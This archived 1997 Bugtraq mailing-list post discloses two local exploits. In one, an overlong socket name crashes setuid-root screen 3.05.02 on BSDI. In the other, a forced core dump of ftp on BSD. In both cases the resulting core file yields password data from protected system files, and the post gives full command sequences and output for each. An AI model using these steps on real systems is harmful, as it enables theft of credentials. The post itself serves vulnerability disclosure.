Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: screen 3.05.02
From: owner-bugtraq () NETSPACE ORG (Khelbin Sunvold)
Date: Sat, 15 Feb 1997 21:18:56 -0800


This exploit is very similer to the FTP exploit on BSD that creates a
ftp.core file you can then strings and get the encrypted password file.

#ftp foobar.com
Welcom to foobar.com ftp site
blah blah blah
please enter login name> evil
that user requires a password> evil2
 User evil loged in welcome to foobar.com!
Remote set to type BIN
200>

(now hit ^Z to suspend the process)

#ps
  PID  TT  STAT      TIME COMMAND
 9526  p0  Ss     0:00.12 -csh (csh)
 9539  p0  R+     0:00.02 ps
1000   p0  Ss     0:00.22 ftp

(get the PID number to the ftp process)

#kill -11 1000

(kill the process)

#fg

(bring the ftp back to the foreground)

Process Killed Core Dump (blah blah)
#ls
home          mail         public_html        ftp.core
#strings ftp.core  > test
#pico test


I know this is an older hole, but what the hell, it still works on BDS!


Bronc Buster
bbuster () succeed net
www2.succeed.net/~bbuster


THe program under question is /usr/contrib/bin/screen (BSDI).  This is
screen version 3.05.02 and is installed setuid root, as it is "supposed"
to be.  Here is a demonstration:

$ screen

Screen version 3.05.02 (FAU) 19-Aug-93

Copyright (c) 1993 Juergen Weigert, Michael Schroeder
Copyright (c) 1987 Oliver Laumann

This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free Software
Foundation; either version 2, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with
this program (see the file COPYING); if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.

Send bugreports, fixes, enhancements, t-shirts, money, beer & pizza to
screen () uni-erlangen de (bah.. send them to Bugtraq!)

                       [Press Space or Return to end.]

$ screen

$ cd /tmp/screens/S-khelbin
$ ls
246.ttyp7.comet
$ mv 246.ttyp* 246.ttyp7.cometanonymousanonymousanonymousanonymous\
anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous\
anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous
$ screen -ls
/tmp/screens/S-khelbin/246.ttyp7.cometanonymousanonymousanonymousanonymousa
nonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanony
mousanonymousanonymousanonymousanonymousanonymousanonymousanonymous:
connect: Invalid argument
%1     278 Abort - core dumped  screen -ls
$ ls -l
total 176
srwx------  1 khelbin  khelbin       0 Feb 15 21:33
246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymo
usanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousan
onymousanonymousanonymousanonymousanonymous
-rw-r--r--  1 khelbin  khelbin  172032 Feb 15 21:33 core.screen
$ strings core.screen|less


The core.screen file contains unencrypted password strings from
/etc/master.passwd, which of course, should not be readable by me.  I'm
also sure there's a buffer-overflow here but I havn't had as much time as
I would like to to look through the source yet.


-khelbin / 9x
email: khelbin () connix com





  By Date           By Thread  

Current thread:
  • Re: screen 3.05.02 Khelbin Sunvold (Feb 16)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault